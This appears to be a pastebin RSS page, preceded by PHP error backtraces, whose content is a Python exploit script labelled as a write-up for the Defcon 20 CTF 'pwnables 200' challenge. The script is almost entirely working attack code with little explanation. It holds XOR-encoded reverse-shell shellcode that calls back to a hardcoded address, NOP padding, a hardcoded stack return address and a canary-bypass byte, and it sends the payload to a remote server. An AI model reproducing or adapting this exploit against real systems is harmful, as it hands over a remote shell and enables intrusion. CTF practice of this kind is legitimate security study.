A PHP Error was encountered

Severity: 8192

Message: Function create_function() is deprecated

Filename: geshi/geshi.php

Line Number: 4698

Backtrace:

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/libraries/geshi/geshi.php
Line: 4698
Function: _error_handler

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/libraries/geshi/geshi.php
Line: 4621
Function: _optimize_regexp_list_tokens_to_string

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/libraries/geshi/geshi.php
Line: 1655
Function: optimize_regexp_list

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/libraries/geshi/geshi.php
Line: 2029
Function: optimize_keyword_group

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/libraries/geshi/geshi.php
Line: 2168
Function: build_parse_cache

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/libraries/Process.php
Line: 45
Function: parse_code

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/models/Pastes.php
Line: 517
Function: syntax

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/controllers/Main.php
Line: 575
Function: getPaste

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/index.php
Line: 315
Function: require_once

A PHP Error was encountered

Severity: Warning

Message: Cannot modify header information - headers already sent by (output started at /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/system/core/Exceptions.php:271)

Filename: view/rss.php

Line Number: 2

Backtrace:

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/themes/geocities/views/view/rss.php
Line: 2
Function: header

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/core/MY_Loader.php
Line: 173
Function: include

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/core/MY_Loader.php
Line: 43
Function: _ci_load

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/controllers/Main.php
Line: 579
Function: view

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/index.php
Line: 315
Function: require_once

exploit write up - Stikked exploit write up - Stikked http://geopaste.scratchbook.ch/ en Re: exploit write up http://geopaste.scratchbook.ch/view/f521451f Sat, 01 Sep 2012 06:31:22 +0200 ' http://geopaste.scratchbook.ch/view/f521451f
  1. #!/bin/python
  2.  
  3. # exploit write up - pwnables 200 Defcon 20 CTF
  4. # by @_g05u_ NULL Life FTW!
  5. import socket, struct
  6.  
  7. #jump to shellcode in stack
  8. ret = struct.pack("<I", 0xbfbee2ac)
  9. #reverse shell 6969 http://www.shell-storm.org/shellcode/files/shellcode-676.php
  10. shellcode = "\x31\xc9\x51\x41\x51\x41\x51\x51\x31\xc0\xb0\x61\xcd\x80\x89\x07\x31\xc9\x88\x4f\x04\xc6\x47\x05\x02\xc7\x47\x08\xbe\xe8\xf5\x09\x66\xc7\x47\x06\x1b\x39\x6a\x10\x8d\x47\x04\x50\x8b\x07\x50\x50\x31\xc0\xb0\x62\xcd\x80\x31\xc9\x51\x8b\x07\x50\x50\x31\xc0\xb0\x5a\xcd\x80\x41\x83\xf9\x03\x75\xef\x31\xc9\x51\x51\x31\xc0\xb0\x17\xcd\x80\xeb\x23\x5b\x89\x1f\x31\xc9\x88\x4b\x07\x89\x4f\x04\x51\x8d\x07\x50\x8b\x07\x50\x50\x31\xc0\xb0\x3b\xcd\x80\x31\xc9\x51\x51\x31\xc0\xb0\x01\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41"
  11.  
  12. shellcode = "\x90" * (512 - len(shellcode) - 100) + shellcode + "\x90" * 100
  13. shellcode = map(lambda x:(ord(x) ^ 0x42), shellcode)
  14. shell_encoded = ''
  15. for s in shellcode:
  16.         shell_encoded += chr(s)
  17.        
  18.        
  19. ret = map(lambda x:(ord(x) ^ 0x42), ret)
  20. ret_encoded = ''
  21. for s in ret:
  22.         ret_encoded += chr(s)
  23.        
  24.  
  25. s = socket.socket()
  26. s.connect(("140.197.217.155", 8912))
  27. s.send("b74b9d86e6cd3480\n")
  28. print s.recv(1024)
  29. s.send("4200A642\n") #decoded shellcode with xor 0x42
  30. print s.recv(1024)
  31.                                         #bypass canarie number in binary
  32. s.send(shell_encoded + "\x4D" + ret_encoded)
]]>